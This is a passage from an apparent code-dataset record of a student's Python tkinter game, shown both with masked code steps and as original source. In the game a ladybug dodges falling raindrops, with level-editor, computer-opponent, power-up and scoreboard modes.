- 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.rainSpeed = 'thunderstorm'\n data.thunderstorm = data.click\n data.drizzle, data.rain = data.notClick, data.notClick\n\n\ndef checkLast(event, data):\n if data.last - data.r <= event.y <= data.last + data.r:\n if data.easyY - 2 * data.r <= event.x <= data.easyY + 2 * data.r:\n data.powerUpsEditor = True\n data.yes, data.no = data.click, data.notClick\n if data.last - 2 * data.r <= event.x <= data.last + 2 * data.r:\n data.powerUpsEditor = False\n data.no, data.yes = data.click, data.notClick\n if data.enter == data.click:\n if data.enterX - data.r <= event.y <= data.enterX + data.r:\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.mode = 'levelCreated'\n\n\ndef drawButtons(canvas, data):\n data.font, data.fill = 'Helvetica 13 bold', 'yellow'\n canvas.create_text(data.medX, data.YST, text='Your Speed:', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Slow', font=data.font)\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium', font=data.font)\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Fast', font=data.font)\n canvas.create_image(data.easyX, data.medX, image=data.drizzle)\n canvas.create_text(data.medX, data.RST, text='Rain Speed:', font=data.\n font, fill=data.fill)\n canvas.create_text(data.easyX, data.medX, text='Drizzle', font=data.font)\n canvas.create_image(data.medX, data.medX, image=data.rain)\n canvas.create_text(data.medX, data.medX, text='Rain', font=data.font)\n canvas.create_image(data.hardX, data.medX, image=data.thunderstorm)\n canvas.create_text(data.hardX, data.medX, text='Heavy', font=data.font)\n canvas.create_text(data.medX, data.PUT, text='PowerUps?', font=data.\n font, fill=data.fill)\n canvas.create_image(data.easyY, data.last, 
image=data.yes)\n canvas.create_text(data.easyY, data.last, text='Yes', font=data.font)\n canvas.create_image(data.last, data.last, image=data.no)\n canvas.create_text(data.last, data.last, text='No', font=data.font)\n changeEnter(canvas, data)\n\n\ndef changeEnter(canvas, data):\n if (data.powerUpsEditor != None and data.yourSpeed != None and data.\n rainSpeed != None):\n data.enter = data.click\n canvas.create_image(data.medX, data.enterX, image=data.enter)\n canvas.create_text(data.medX, data.enterX, text='Enter', font=data.font)\n\n\ndef editorTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef editorRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.S_P - 10, text=\n 'Edit Your Level!', font='Arial 23 bold', fill='yellow')\n drawButtons(canvas, data)\n drawHome(canvas, data)\n\n\ndef setEverything(data):\n if data.yourSpeed == 'slow':\n data.speed = 6\n elif data.yourSpeed == 'medium':\n data.speed = 10\n elif data.yourSpeed == 'fast':\n data.speed = 14\n if data.rainSpeed == 'thunderstorm':\n data.rSpeed = 7\n elif data.rainSpeed == 'rain':\n data.rSpeed = 10\n elif data.rainSpeed == 'drizzle':\n data.rSpeed = 13\n\n\n<mask token>\n\n\ndef levelPowerUp(data):\n if data.powerUpsEditor == True:\n if data.time % 20 == 0 and data.time % 40 != 0:\n Position = random.choice(data.spotList)\n data.powerUps.append(PowerUps(Position, 0))\n if data.time % 30 == 0:\n Position = random.choice(data.spotList)\n data.invincible.append(Invincible(Position, 0))\n if data.time % 35 == 0:\n Position = random.choice(data.spotList)\n 
data.scaryBug.append(ScaryBug(Position, 750))\n\n\n<mask token>\n\n\ndef levelCreatedMousePressed(event, data):\n checkHome(event, data)\n\n\ndef levelCreatedTimerFired(data):\n setEverything(data)\n if data.levelEditorLives > 0:\n data.cy -= data.speed\n if data.cy < 15:\n data.level += 1\n if data.cy > 40:\n data.time += 1\n if data.pauseDrops != True:\n levelCoconutShot(data)\n if data.powerUpsEditor == False:\n for coconut in data.coconuts:\n coconut.onTimerFired(data)\n hit(data)\n if data.powerUpsEditor == True:\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n for coconut in data.coconuts:\n if data.pauseDrops == False:\n coconut.onTimerFired(data)\n if data.beInvincible == False:\n hit(data)\n if data.start != None:\n if abs(data.start - data.cy) >= 120:\n data.pauseDrops, data.beInvincible = False, False\n\n\ndef levelCreatedRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconuts:\n coconut.draw(canvas)\n if data.powerUpsEditor == True:\n drawPowerups(canvas, data)\n canvas.create_image(data.cx, data.cy, image=data.ladyBug)\n canvas.create_text(data.width / 6, 100, text='Total Lives: %d' % data.\n levelEditorLives, font='Arial 20 bold', fill='yellow')\n canvas.create_text(data.width / 2, 660, text=\n \"\"\"You lose a life for hitting a drop\n & don't get eaten!\"\"\",\n font='Arial 15 bold', fill='yellow')\n if data.levelEditorLives <= 0:\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n deadScreen)\n canvas.create_text(data.width / 2, data.height / 4, text=\n 'You Lose! 
Better Luck Next Time!', font='Helvetica 23 bold',\n fill='yellow')\n if data.level > 1:\n winEditor(canvas, data)\n drawHome(canvas, data)\n\n\ndef winEditor(canvas, data):\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='You Made it!', font=\n 'Arial 23 bold', fill='yellow')\n\n\n<mask token>\n\n\ndef drawDifficulties(canvas, data):\n canvas.create_text(data.medX, data.AITY, text='Computer Difficulty:',\n font='Arial 23 bold', fill='yellow')\n canvas.create_image(data.easyX, data.easyY, image=data.slow)\n canvas.create_text(data.easyX, data.easyY, text='Easy')\n canvas.create_image(data.medX, data.easyY, image=data.medium)\n canvas.create_text(data.medX, data.easyY, text='Medium')\n canvas.create_image(data.hardX, data.easyY, image=data.fast)\n canvas.create_text(data.hardX, data.easyY, text='Hard')\n if data.difficulty != None:\n data.enter = data.click\n canvas.create_image(data.medX, data.enterY, image=data.enter)\n canvas.create_text(data.medX, data.enterY, text='Enter')\n\n\ndef difficultyMousePressed(event, data):\n checkHome(event, data)\n if data.easyY - data.r <= event.y <= data.easyY + data.r:\n if data.easyX - 2 * data.r <= event.x <= data.easyX + 2 * data.r:\n data.difficulty = data.difS\n data.slow = data.click\n data.medium, data.fast = data.notClick, data.notClick\n if data.medX - 2 * data.r <= event.x <= data.medX + 2 * data.r:\n data.difficulty = data.difM\n data.medium = data.click\n data.slow, data.fast = data.notClick, data.notClick\n if data.hardX - 2 * data.r <= event.x <= data.hardX + 2 * data.r:\n data.difficulty = data.difH\n data.fast = data.click\n data.slow, data.medium = data.notClick, data.notClick\n if data.enter == data.click:\n if data.enterY - data.r <= event.y <= data.enterY + data.r:\n if data.medX - 2 * data.r <= event.x <= 
data.medX + 2 * data.r:\n data.mode = 'AI'\n\n\ndef difficultyTimerFired(data):\n data.editorTime += 1\n if data.editorTime % 2 == 0:\n rainDrop(data)\n for drop in data.editorDrops:\n drop.onTimerFired(data)\n\n\ndef rainDrop(data):\n xPosition = random.randint(0, data.width)\n data.editorDrops.append(Coconuts(xPosition, 0))\n\n\ndef difficultyRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.height / 2, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawDifficulties(canvas, data)\n drawHome(canvas, data)\n\n\ndef hitAI1(data, distance):\n for coconut in data.coconutsAI1:\n if (data.player1Y - data.r - coconut.y <= distance and data.\n switchOnProgress == False):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r or AISwitchBug(data, distance) == True):\n testInt = random.randint(0, 9)\n if testInt <= data.difficulty:\n data.switchOnProgress = True\n if data.player1X == 150:\n data.player1X = 340\n else:\n data.player1X = 150\n data.switchOnProgress = False\n if (coconut.y >= data.player1Y - data.r and coconut.y <= data.\n player1Y + data.r):\n if (coconut.x >= data.player1X - data.r and coconut.x <= data.\n player1X + data.r):\n data.player1Y += 50\n data.coconutsAI1.remove(coconut)\n\n\ndef AISwitchBug(data, distance):\n for scaryBug in data.scaryBug:\n if (data.player1Y - data.r - scaryBug.y <= distance and data.\n switchOnProgress == False):\n if (scaryBug.x >= data.player1X - data.r and scaryBug.x <= data\n .player1X + data.r):\n return True\n\n\ndef hitAI2(data, distance):\n for coconut in data.coconutsAI2:\n if (coconut.y >= data.player2Y - data.r and coconut.y <= data.\n player2Y + data.r):\n if (coconut.x >= data.player2X - data.r and coconut.x <= data.\n player2X + data.r):\n data.player2Y += 50\n data.coconutsAI2.remove(coconut)\n\n\ndef coconutShotAI(data):\n if data.winner == None:\n if data.time % 15 
== 0:\n xPosition1 = random.randint(0, 385)\n if abs(xPosition1 - 100) > 40 and abs(xPosition1 - 360) > 40:\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition1, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition1 + 410, 0))\n if data.time % 8 == 0:\n xPosition2 = random.randint(0, 80)\n xPosition3 = random.randint(364, 385)\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(xPosition2, 0))\n data.coconutsAI1.append(Coconuts(xPosition3, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(xPosition2 + 410, 0))\n data.coconutsAI2.append(Coconuts(xPosition3 + 410, 0))\n addExtraCoconut(data)\n addPowerUpsAI(data)\n\n\ndef addExtraCoconut(data):\n if data.time % 18 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(140, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(540, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.coconutsAI1.append(Coconuts(344, 0))\n if data.pause2Drop != True:\n data.coconutsAI2.append(Coconuts(755, 0))\n if data.time % 37 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(140, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.powerUps.append(PowerUps(344, 0))\n if data.pause2Drop != True:\n data.powerUps.append(PowerUps(755, 0))\n\n\ndef addPowerUpsAI(data):\n if data.time % 33 == 0:\n side = random.choice(data.sides)\n if side == 'l':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(140, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(550, 0))\n elif side == 'r':\n if data.pause1Drop != True:\n data.invincible.append(Invincible(344, 0))\n if data.pause2Drop != True:\n data.invincible.append(Invincible(755, 0))\n if data.time % 66 == 0:\n side = 
random.choice(data.sides)\n if side == 'l':\n data.scaryBug.append(ScaryBug(140, 750))\n data.scaryBug.append(ScaryBug(550, 750))\n elif side == 'r':\n data.scaryBug.append(ScaryBug(344, 750))\n data.scaryBug.append(ScaryBug(750, 750))\n\n\ndef AIKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n if data.winner == None:\n if event.keysym == 'Left' and data.onLeft1 == False:\n data.onLeft1 = True\n data.player2X = 550\n elif event.keysym == 'Right' and data.onLeft1 == True:\n data.onLeft1 = False\n data.player2X = 750\n\n\ndef AIMousePressed(event, data):\n checkHome(event, data)\n\n\ndef AITimerFired(data):\n if data.winner == None:\n if data.Invincible1 == False:\n hitAI1(data, 31)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 31)\n for coconut in data.coconutsAI1:\n if data.pause1Drop == False:\n coconut.onTimerFired(data)\n for coconut in data.coconutsAI2:\n if data.pause2Drop == False:\n coconut.onTimerFired(data)\n if data.Invincible1 == False:\n hitAI1(data, 13)\n if data.Invincible2 == True:\n pass\n elif data.Invincible2 == False:\n hitAI2(data, 13)\n data.player1Y -= data.speedAI\n if data.player1Y < 15 and data.player2Y > 15:\n data.winner = 'player1'\n if data.player1Y > 40:\n data.time += 1\n coconutShotAI(data)\n data.player2Y -= data.speedAI\n if data.player2Y < 15 and data.player1Y > 15:\n data.winner = 'player2'\n if data.player2Y > 40:\n data.time += 1\n coconutShotAI(data)\n if data.player1Y < 15 and data.player2Y < 15:\n data.winner = 'tie'\n for powerUp in data.powerUps:\n powerUp.onTimerFired(data)\n hitPause(data)\n powerUpAITimerFired(data)\n\n\ndef powerUpAITimerFired(data):\n for powerUp in data.invincible:\n powerUp.onTimerFired(data)\n hitInvincible(data)\n for bug in data.scaryBug:\n bug.onTimerFired(data)\n hitScaryBug(data)\n if data.start1 != None:\n if abs(data.start1 - data.player1Y) >= 120:\n data.pause1Drop = False\n data.Invincible1 = False\n if data.start2 != None:\n if 
abs(data.start2 - data.player2Y) >= 120:\n data.pause2Drop = False\n data.Invincible2 = False\n\n\ndef AIRedrawAll(canvas, data):\n canvas.create_image(data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_image(3 * data.width / 4, data.height / 2, image=data.\n halfBackground)\n canvas.create_line(data.width / 2, 0, data.width / 2, data.height, width=10\n )\n canvas.create_line(0, 20, data.width, 20)\n for coconut in data.coconutsAI1:\n coconut.draw(canvas)\n for coconut in data.coconutsAI2:\n coconut.draw(canvas)\n canvas.create_text(50, 40, text='Computer', font='Arial 15 bold', fill=\n 'yellow')\n canvas.create_text(450, 40, text='Player 1', font='Arial 15 bold', fill\n ='yellow')\n drawPowerups(canvas, data)\n canvas.create_image(data.player1X, data.player1Y, image=data.ladyBug)\n canvas.create_image(data.player2X, data.player2Y, image=data.ladyBug)\n AIWinner(canvas, data)\n drawHome(canvas, data)\n\n\ndef AIWinner(canvas, data):\n if data.winner == 'player1':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text='The Computer Won :(',\n font='Arial 23 bold', fill='yellow')\n elif data.winner == 'player2':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'You Made it! You Won!', font='Arial 23 bold', fill='yellow')\n elif data.winner == 'tie':\n canvas.create_rectangle(0, 0, data.width, data.height, fill='black')\n canvas.create_image(data.width / 2, data.height / 2, image=data.\n winScreen)\n canvas.create_image(300, 320, image=data.winBug)\n canvas.create_text(data.width / 2, 100, text=\n 'Tie! 
You Both Made it!', font='Arial 23 bold', fill='yellow')\n\n\ndef scoreboardKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\ndef scoreboardMousePressed(event, data):\n checkHome(event, data)\n\n\ndef scoreboardTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef scoreboardRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.height / 2, image=data.background)\n canvas.create_image(data.width / 2, data.tbgY, image=data.tbg)\n for drop in data.editorDrops:\n drop.draw(canvas)\n canvas.create_text(data.width / 2, data.txtTScore, text='Top Scores!',\n font='Arial 30 bold', fill='yellow')\n canvas.create_text(data.width / 2, data.S_P, text='Score_Player', font=\n 'Arial 20 bold', fill='yellow')\n drawHome(canvas, data)\n data.savedScores\n data.savedScores = readFile('score.txt')\n score = data.savedScores.splitlines()\n scores = []\n for line in score:\n scores.append(line.split(','))\n scores = sorted(scores, key=lambda x: int(x[0]))\n top5 = scores[-data.numScores:]\n top5.reverse()\n for i in range(len(top5)):\n canvas.create_text(data.width / 2, data.scoreShift + i * 50, text=\n top5[i], font='Arial 18 bold', fill='yellow')\n\n\ndef helpKeyPressed(event, data):\n if event.keysym == 'r':\n init(data)\n\n\n<mask token>\n\n\ndef helpTimerFired(data):\n difficultyTimerFired(data)\n\n\ndef helpRedrawAll(canvas, data):\n canvas.create_image(data.width / 2, data.helpY, image=data.helpScreen)\n for drop in data.editorDrops:\n drop.draw(canvas)\n drawHome(canvas, data)\n\n\ndef run(width=15000, height=25000):\n\n def redrawAllWrapper(canvas, data):\n canvas.delete(ALL)\n redrawAll(canvas, data)\n canvas.update()\n\n def mousePressedWrapper(event, canvas, data):\n mousePressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def keyPressedWrapper(event, canvas, data):\n keyPressed(event, data)\n redrawAllWrapper(canvas, data)\n\n def timerFiredWrapper(canvas, data):\n timerFired(data)\n redrawAllWrapper(canvas, data)\n 
canvas.after(data.timerDelay, timerFiredWrapper, canvas, data)\n\n\n class Struct(object):\n pass\n data = Struct()\n data.width = width\n data.height = height\n data.timerDelay = 100\n root = Tk()\n init(data)\n canvas = Canvas(root, width=data.width, height=data.height)\n canvas.pack()\n root.bind('<Button-1>', lambda event: mousePressedWrapper(event, canvas,\n data))\n root.bind('<Key>', lambda event: keyPressedWrapper(event, canvas, data))\n timerFiredWrapper(canvas, data)\n root.mainloop()\n print('bye!')\n\n\n<mask token>\n",
"step-5": "#Arushi Patel (aruship)\r\nfrom tkinter import *\r\nimport random\r\n\r\n######################################\r\n#images taken from wikipedia,pixabay,\r\n#trans americas, clipartpanda,pngimg,\r\n#findicons, microsoft word\r\n######################################\r\n\r\n####################################\r\n# init\r\n####################################\r\ndef init(data):\r\n data.score =0\r\n data.mode = \"splashScreen\"\r\n data.timerDelay = 100\r\n data.height = 800\r\n data.width = 800\r\n data.speed = 10\r\n data.speedAI = 12\r\n data.speedAI2 = 12\r\n data.switchOnProgress = False\r\n data.r = 25\r\n data.cx= 280\r\n data.cy=750\r\n data.onLeft1, data.onLeft2 = True, True\r\n data.win= False\r\n data.coconuts = []\r\n data.powerUps = []\r\n data.coconuts1 = []\r\n data.coconuts2 = []\r\n data.coconutsAI1 =[]\r\n data.coconutsAI2 = []\r\n data.invincible = []\r\n data.pauseDrops = False\r\n data.pause1Drop = False\r\n data.pause2Drop = False\r\n init1(data)\r\n\r\ndef init1(data):\r\n data.beInvincible = False\r\n data.Invincible1 = False\r\n data.Invincible2 = False\r\n data.scaryBug = []\r\n data.time = 0\r\n data.coconutFall = False\r\n data.sides = [\"r\", \"l\"]\r\n data.level = 1\r\n data.splashScreenTime = 0\r\n data.splashScreenDrops = []\r\n data.background= PhotoImage(file=\"tree.gif\")\r\n data.deadScreen = PhotoImage(file = \"deadBug.gif\")\r\n data.ladyBug = PhotoImage(file = \"lady.gif\")\r\n data.winScreen= PhotoImage(file = \"treeTop1.gif\")\r\n data.winBug = PhotoImage(file = \"littleBug.gif\")\r\n data.halfBackground = PhotoImage(file = \"halfTree.gif\")\r\n data.umbrella = PhotoImage(file = \"umbrella2.gif\")\r\n data.spider = PhotoImage(file = \"spider.gif\")\r\n data.hourGlass = PhotoImage(file = \"hourGlass.gif\")\r\n data.splashScreen = PhotoImage(file = \"splash.gif\")\r\n init2(data)\r\n\r\ndef init2(data):\r\n data.tbg= PhotoImage(file = \"tbg2.gif\")\r\n data.click = PhotoImage(file = \"click.gif\")\r\n data.notClick = 
PhotoImage(file = \"notClick.gif\")\r\n data.player1X = 150\r\n data.player1Y = 750\r\n data.player2X = 550\r\n data.player2Y = 750\r\n data.winner = None\r\n data.speed = 12\r\n data.speed2 = 12\r\n data.editorTime = 0\r\n data.editorDrops = []\r\n data.margin = 100\r\n data.enter = False\r\n data.powerUpsEditor = None\r\n data.yourSpeed = None\r\n data.rainSpeed = None\r\n data.slow= data.notClick\r\n data.medium = data.notClick\r\n data.fast = data.notClick\r\n data.drizzle = data.notClick\r\n data.rain =data.notClick\r\n data.thunderstorm = data.notClick\r\n init3(data)\r\n\r\ndef init3(data):\r\n data.yes = data.notClick\r\n data.no = data.notClick\r\n data.enter = data.notClick\r\n data.levelEditorLives =2\r\n data.rSpeed = None\r\n data.start = None\r\n data.start1 = None\r\n data.start2 = None\r\n data.difficulty = None\r\n data.mode1 = data.notClick\r\n data.mode2 = data.notClick\r\n data.mode3 = data.notClick\r\n data.mode4 = data.notClick\r\n data.mode5 = data.notClick\r\n data.mode6 = data.notClick\r\n data.home = PhotoImage(file = \"home.gif\")\r\n data.helpScreen = PhotoImage(file = \"help1.gif\")\r\n data.title = PhotoImage(file = \"title.gif\")\r\n data.scoreList = []\r\n data.spotList = [270,364,458,552, 646, 740]\r\n data.savedScores = readFile(\"score.txt\")\r\n if data.mode == \"levelCreated\":\r\n setEverything(data)\r\n initsplashScreenNumbers(data)\r\n\r\ndef initsplashScreenNumbers(data):\r\n data.splashButtonY = 425\r\n data.p1ButtonX= 225\r\n data.p2ButtonX = 290\r\n data.edButton = 355\r\n data.diffButton = 425\r\n data.helpButton = 490\r\n data.sboardButton = 555\r\n data.hitPenalty = 75\r\n data.splashText = data.height/2-20\r\n data.lives = 2\r\n data.levelMax = 8\r\n data.lane = 94\r\n data.Player1Min= 270\r\n data.Player1Max = 740\r\n data.homeX =50\r\n data.homeY = 650\r\n initScoreBoardHelp(data)\r\n init1Player(data)\r\n\r\ndef initScoreBoardHelp(data):\r\n data.tbgY=5*data.height/12\r\n data.txtTScore = 150\r\n data.S_P = 220\r\n 
data.numScores = 5\r\n data.scorePos = data.height/10\r\n data.scoreShift = 270\r\n data.helpY = data.height/2-20\r\n data.name = \"\"\r\n data.printName = \"\"\r\n data.hit = False\r\n initAI(data)\r\n\r\ndef init1Player(data):\r\n data.buffer = 40\r\n\r\ndef initAI(data):\r\n data.AITY = 225\r\n data.easyX = 200\r\n data.easyY = 300\r\n data.medX =400\r\n data.hardX = 600\r\n data.enterY = 450\r\n data.difS = 4\r\n data.difM = 6\r\n data.difH = 8\r\n data.last = 500\r\n data.enterX = 575\r\n data.PUT = 450\r\n data.RST = 350\r\n data.YST = 250\r\n####################################\r\n# mode dispatcher\r\n####################################\r\n\r\ndef mousePressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashScreenMousePressed(event, data)\r\n elif (data.mode == \"1Player\"): playerMousePressed(event, data)\r\n elif (data.mode == \"2Player\"): twoPlayerMousePressed(event, data)\r\n elif (data.mode == \"editor\"): editorMousePressed(event,data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedMousePressed(event,data)\r\n elif (data.mode == \"AI\"): AIMousePressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyMousePressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardMousePressed(event, data)\r\n elif (data.mode == \"help\"): helpMousePressed(event, data)\r\n\r\ndef keyPressed(event, data):\r\n if (data.mode == \"splashScreen\"): splashKeyPressed(event, data)\r\n elif (data.mode == \"1Player\"):playerKeyPressed(event, data)\r\n elif (data.mode == \"2Player\"):twoPlayerKeyPressed(event, data)\r\n elif (data.mode == \"editor\"): editorKeyPressed(event, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedKeyPressed(event,data)\r\n elif (data.mode == \"AI\"): AIKeyPressed(event, data)\r\n elif (data.mode == \"difficulty\"): difficultyKeyPressed(event, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardKeyPressed(event, data)\r\n elif (data.mode == \"help\"): helpKeyPressed(event, data)\r\n \r\ndef 
timerFired(data):\r\n if (data.mode == \"splashScreen\"): splashScreenTimerFired(data)\r\n elif (data.mode == \"1Player\"):playerTimerFired(data)\r\n elif (data.mode == \"2Player\"):twoPlayerTimerFired(data)\r\n elif (data.mode == \"editor\"): editorTimerFired(data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedTimerFired(data)\r\n elif (data.mode == \"AI\"): AITimerFired(data)\r\n elif (data.mode == \"difficulty\"): difficultyTimerFired(data)\r\n elif (data.mode == \"scoreboard\"): scoreboardTimerFired(data)\r\n elif (data.mode == \"help\"): helpTimerFired(data)\r\n\r\ndef redrawAll(canvas, data):\r\n if (data.mode == \"splashScreen\"): splashScreenRedrawAll(canvas, data)\r\n elif (data.mode == \"1Player\"):playerRedrawAll(canvas, data)\r\n elif (data.mode == \"2Player\"):twoPlayerRedrawAll(canvas, data)\r\n elif (data.mode == \"editor\"): editorRedrawAll(canvas, data)\r\n elif (data.mode == \"levelCreated\"): levelCreatedRedrawAll(canvas,data)\r\n elif (data.mode == \"AI\"): AIRedrawAll(canvas, data)\r\n elif (data.mode == \"difficulty\"): difficultyRedrawAll(canvas, data)\r\n elif (data.mode == \"scoreboard\"): scoreboardRedrawAll(canvas, data)\r\n elif (data.mode == \"help\"): helpRedrawAll(canvas, data)\r\n\r\n####################################\r\n# splashScreen mode\r\n####################################\r\ndef splashScreenMousePressed(event, data):\r\n #checks for selection of mode\r\n if data.splashButtonY-2*data.r <= event.x <=data.splashButtonY+2*data.r:\r\n if data.p1ButtonX-data.r<=event.y<=data.p1ButtonX+data.r:\r\n data.mode = \"1Player\"\r\n if data.p2ButtonX-data.r<=event.y<=data.p2ButtonX+data.r:\r\n data.mode = \"2Player\"\r\n if data.edButton-data.r<=event.y<=data.edButton+data.r:\r\n data.mode = \"editor\"\r\n if data.diffButton-data.r<=event.y<=data.diffButton+data.r:\r\n data.mode = \"difficulty\"\r\n if data.helpButton-data.r<=event.y<=data.helpButton+data.r:\r\n data.mode = \"help\"\r\n if 
data.sboardButton-data.r<=event.y<=data.sboardButton+data.r:\r\n data.mode = \"scoreboard\"\r\n\r\ndef splashKeyPressed(event, data):\r\n pass\r\n\r\n\r\ndef splashScreenTimerFired(data):\r\n data.splashScreenTime += 1\r\n if data.splashScreenTime %2 ==1:\r\n rainDropSplash(data)\r\n for drop in data.splashScreenDrops:\r\n drop.onTimerFired(data)\r\n\r\ndef splashScreenButtons(canvas, data):\r\n canvas.create_image(data.splashButtonY,data.p1ButtonX,image = data.mode1)\r\n canvas.create_image(data.splashButtonY,data.p2ButtonX,image = data.mode2)\r\n canvas.create_image(data.splashButtonY,data.edButton,image = data.mode3)\r\n canvas.create_image(data.splashButtonY,data.diffButton,image = data.mode4)\r\n canvas.create_image(data.splashButtonY,data.helpButton,image = data.mode5)\r\n canvas.create_image(data.splashButtonY,data.sboardButton,image =data.mode6)\r\n \r\ndef rainDropSplash(data):\r\n xPosition = random.randint(0,800)\r\n data.splashScreenDrops.append(Coconuts(xPosition,0))\r\n\r\ndef splashScreenRedrawAll(canvas, data):\r\n canvas.create_image(data.width/2, data.splashText-10, image=data.title)\r\n for drop in data.splashScreenDrops: drop.draw(canvas)\r\n canvas.create_text(data.width/2, data.splashText, text=\"\"\"\r\n 1.) Single Player Level Mode\r\n\r\n\r\n 2.) Two-Player Mode\r\n\r\n \r\n 3.) Level Creator Practice Mode\r\n\r\n \r\n 4.) Play Against the Computer\r\n\r\n \r\n 5.) Help and Instructions\r\n\r\n \r\n 6.) 
Scoreboard\r\n\r\n \r\n \"\"\", font=\"Arial 14 bold\", fill = \"yellow\")\r\n splashScreenButtons(canvas, data)\r\n\r\n####################################\r\n# taken from class notes\r\n####################################\r\n\r\ndef writeFile(path, contents):\r\n with open(path, \"wt\") as f:\r\n f.write(contents)\r\n\r\ndef readFile(path):\r\n with open(path, \"rt\") as f:\r\n return f.read()\r\n\r\n####################################\r\n# 1Player mode\r\n####################################\r\n\r\n\r\n#Coconuts (from Mario game) represent the water drops\r\nclass Coconuts(object):\r\n def __init__(self,x,y):\r\n self.x = x\r\n self.y = y\r\n self.r = 9\r\n self.fill = \"deep sky blue\"\r\n self.speed = 30\r\n self.outline= \"blue\"\r\n\r\n def draw(self, canvas):\r\n canvas.create_polygon(self.x,self.y- 2*self.r,\r\n self.x-self.r, self.y,\r\n self.x, self.y + self.r,\r\n self.x+self.r, self.y, fill = self.fill,\r\n outline = self.outline, width = 3)\r\n\r\n def onTimerFired(self, data):\r\n # downward falling motion\r\n self.y += self.speed\r\n \r\ndef hit(data):\r\n #checks for hitting rain\r\n for coconut in data.coconuts:\r\n if data.mode == \"1Player\" or data.mode == \"levelCreated\":\r\n if coconut.y>=data.cy-data.r and coconut.y<=data.cy+data.r:\r\n if coconut.x>=data.cx-data.r and coconut.x<=data.cx+data.r:\r\n data.cy+=data.hitPenalty\r\n if data.mode == \"levelCreated\":\r\n data.lives-=1\r\n elif data.hit ==False and data.level<data.levelMax:\r\n data.score -=data.level\r\n data.coconuts.remove(coconut)\r\n if data.mode == \"levelCreated\":\r\n data.levelEditorLives-=1\r\n\r\n \r\ndef hit2Player(data):\r\n if data.mode == \"2Player\":\r\n if data.Invincible1 == False:\r\n #only when powerup isn't active\r\n for coconut in data.coconuts1:\r\n if coconut.y>=data.player1Y-data.r \\\r\n and coconut.y<=data.player1Y+data.r:\r\n if coconut.x>=data.player1X-data.r and \\\r\n coconut.x<=data.player1X+data.r:\r\n data.player1Y+=data.hitPenalty \r\n 
